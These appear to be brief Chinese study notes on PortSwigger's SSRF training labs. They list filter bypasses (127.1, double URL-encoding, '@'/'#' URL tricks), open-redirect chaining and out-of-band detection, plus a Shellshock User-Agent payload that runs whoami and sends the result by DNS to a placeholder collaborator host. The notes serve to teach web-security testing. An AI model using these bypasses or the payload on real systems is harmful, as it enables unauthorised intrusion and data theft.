All labs | Web Security Academy
1.黑名单绕过
SSRF with blacklist-based input filter
1.过滤127.0.0.1
127.1
2.过滤目录,如admin
admin二次url编码
2.白名单绕过
SSRF with whitelist-based input filter
1.要求域名必须是stock.weliketoshop.net(常规的请求地址)
利用点:url规范
url中的@:<用户名>@<域名>
url中的#:<域名>#<位置标识符>
将#二次url编码实现绕过
@绕过白名单,解码出来的#锁定127.0.0.1
3.重定向利用
SSRF with filter bypass via open redirection vulnerability
解码后的stockApi
在另一翻页处(next product),发现类似的path参数,内容为路径
猜测两处公用一个api(stockApi),构造新的stockApi进行测试
利用爆破手段获得管理员所在的内网ip地址
找到删除用户的url,改包放包
4.盲ssrf-带外检测
Blind SSRF with out-of-band detection
测试点
页面请求中获取了referer
将其改为bp的站点
成功回显
5.盲SSRF-Sellshock利用
Blind SSRF with Shellshock exploitation
插件扫描出Referer和User-Agent存在SSRF
User-agent()输入 { :; }; /usr/bin/nslookup $(whoami).bp域名 执行命令
Referer爆破内网站点
存在成功执行的机器
输入得到的用户名完成实验